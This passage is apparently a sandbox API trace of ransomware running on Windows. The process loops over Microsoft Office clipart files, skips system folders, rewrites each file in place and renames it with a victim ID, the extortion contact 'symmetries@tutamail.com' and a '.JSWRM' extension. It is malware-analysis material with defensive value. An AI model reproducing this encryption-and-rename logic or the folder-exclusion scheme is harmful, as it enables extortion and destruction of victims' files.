lpUsedDefaultChar=0x0) returned 12 [0092.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0092.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0092.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01361_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01361_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01361_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0092.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01361_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.136] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7028) returned 1 [0092.136] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b70) returned 0x205850 [0092.136] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b70, lpOverlapped=0x0) returned 1 [0092.138] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.138] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b70, lpOverlapped=0x0) returned 1 [0092.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.138] CloseHandle (hObject=0x314) returned 1 [0092.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0092.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0092.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0092.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0092.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0092.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.139] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01361_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01361_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01361_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0092.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.140] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5f6d6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5f6d6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5f6d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40412, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01368_.WMF", cAlternateFileName="")) returned 1 [0092.140] lstrcmpiW (lpString1="NA01368_.WMF", lpString2=".") returned 1 [0092.140] lstrcmpiW (lpString1="NA01368_.WMF", lpString2="..") returned 1 [0092.140] lstrcmpiW (lpString1="NA01368_.WMF", lpString2="...") returned 1 [0092.140] lstrcmpiW (lpString1="NA01368_.WMF", lpString2="windows") returned -1 [0092.140] lstrcmpiW (lpString1="NA01368_.WMF", lpString2="recovery") returned -1 [0092.140] lstrcmpiW (lpString1="NA01368_.WMF", lpString2="perflogs") returned -1 [0092.140] lstrcmpiW (lpString1="NA01368_.WMF", lpString2="documents and settings") returned 1 [0092.140] lstrcmpiW (lpString1="NA01368_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.140] lstrcmpiW (lpString1="NA01368_.WMF", lpString2="system volume information") returned -1 [0092.140] lstrcmpiW (lpString1="NA01368_.WMF", lpString2="msocache") returned 1 [0092.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0092.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01368_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01368_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01368_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0092.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01368_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01368_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01368_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01368_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01368_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.141] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=263186) returned 1 [0092.141] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0092.142] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0092.172] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.172] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0092.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.172] CloseHandle (hObject=0x314) returned 1 [0092.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0092.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0092.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0092.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0092.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0092.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.173] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01368_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01368_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01368_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01368_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0092.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.174] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5f6d6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5f6d6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5f6d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b16e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01421_.WMF", cAlternateFileName="")) returned 1 [0092.174] lstrcmpiW (lpString1="NA01421_.WMF", lpString2=".") returned 1 [0092.174] lstrcmpiW (lpString1="NA01421_.WMF", lpString2="..") returned 1 [0092.174] lstrcmpiW (lpString1="NA01421_.WMF", lpString2="...") returned 1 [0092.174] lstrcmpiW (lpString1="NA01421_.WMF", lpString2="windows") returned -1 [0092.174] lstrcmpiW (lpString1="NA01421_.WMF", lpString2="recovery") returned -1 [0092.174] lstrcmpiW (lpString1="NA01421_.WMF", lpString2="perflogs") returned -1 [0092.174] lstrcmpiW (lpString1="NA01421_.WMF", lpString2="documents and settings") returned 1 [0092.174] lstrcmpiW (lpString1="NA01421_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.174] lstrcmpiW (lpString1="NA01421_.WMF", lpString2="system volume information") returned -1 [0092.174] lstrcmpiW (lpString1="NA01421_.WMF", lpString2="msocache") returned 1 [0092.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0092.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01421_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01421_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01421_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0092.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0092.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01421_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01421_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01421_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0092.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01421_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01421_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.175] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=176494) returned 1 [0092.176] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0092.176] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0092.187] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.187] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0092.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.188] CloseHandle (hObject=0x314) returned 1 [0092.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0092.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0092.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0092.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0092.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0092.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.188] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01421_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01421_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01421_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01421_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0092.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.190] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x100fdad1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x100fdad1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e82, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01468_.WMF", cAlternateFileName="")) returned 1 [0092.190] lstrcmpiW (lpString1="NA01468_.WMF", lpString2=".") returned 1 [0092.191] lstrcmpiW (lpString1="NA01468_.WMF", lpString2="..") returned 1 [0092.191] lstrcmpiW (lpString1="NA01468_.WMF", lpString2="...") returned 1 [0092.191] lstrcmpiW (lpString1="NA01468_.WMF", lpString2="windows") returned -1 [0092.191] lstrcmpiW (lpString1="NA01468_.WMF", lpString2="recovery") returned -1 [0092.191] lstrcmpiW (lpString1="NA01468_.WMF", lpString2="perflogs") returned -1 [0092.191] lstrcmpiW (lpString1="NA01468_.WMF", lpString2="documents and settings") returned 1 [0092.191] lstrcmpiW (lpString1="NA01468_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.191] lstrcmpiW (lpString1="NA01468_.WMF", lpString2="system volume information") returned -1 [0092.191] lstrcmpiW (lpString1="NA01468_.WMF", lpString2="msocache") returned 1 [0092.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0092.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01468_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01468_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01468_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0092.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0092.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01468_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01468_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01468_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0092.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01468_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01468_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 